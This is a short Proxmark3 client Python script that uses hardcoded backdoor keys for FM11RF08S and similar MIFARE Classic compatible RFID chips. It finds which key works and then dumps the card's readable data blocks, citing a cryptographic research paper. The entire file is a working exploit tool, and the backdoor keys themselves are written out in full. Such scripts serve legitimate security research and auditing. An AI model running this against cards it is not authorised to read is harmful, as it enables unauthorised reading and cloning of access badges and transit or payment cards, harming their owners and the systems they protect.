client/pyscripts/mf_backdoor_dump.py

   1 #!/usr/bin/env python3
   2
   3 # Uses the backdoor keys for the FM11RF08S (and similar) chipsets to quickly dump all the data they can read
   4 # Should work on vulnerable 1k and 4k chips
   5 # Based on the work in this paper: https://eprint.iacr.org/2024/1275
   6
   7 import pm3
   8 import sys
   9
  10 BACKDOOR_KEYS = [("A396EFA4E24F", "1k"), ("A31667A8CEC1", "1k"), ("518B3354E760", "4k")]
  11 WORKING_KEY = None
  12
  13 required_version = (3, 8)
  14 if sys.version_info < required_version:
  15     print(f"Python version: {sys.version}")
  16     print(f"The script needs at least Python v{required_version[0]}.{required_version[1]}. Abort.")
  17     exit()
  18 p = pm3.pm3()
  19
  20 # Test all the keys first to see which one works (if any)
  21 for bk, sz in BACKDOOR_KEYS:
  22     p.console(f"hf mf ecfill --{sz} -c 4 -k {bk}")
  23     output = p.grabbed_output.split('\n')
  24
  25     if "[#] Card not found" in output:
  26         print("Error reading the tag:")
  27         print("\n".join(output))
  28         break
  29     elif "[-] Fill ( fail )" in output:
  30         continue
  31     elif "[+] Fill ( ok )" not in output:
  32         print("Unexpected output, exiting:")
  33         print("\n".join(output))
  34         break
  35     else:
  36         WORKING_KEY = bk
  37         break
  38
  39 if WORKING_KEY is None:
  40     print("None of the backdoor keys seem to work with this tag.")
  41 else:
  42     print(f"Backdoor key {WORKING_KEY} seems to work, dumping data...")
  43     print("IMPORTANT: Only data blocks and access bytes can be dumped; keys will be shown as all 0's")
  44     p.console(f"hf mf eview --{sz}", True)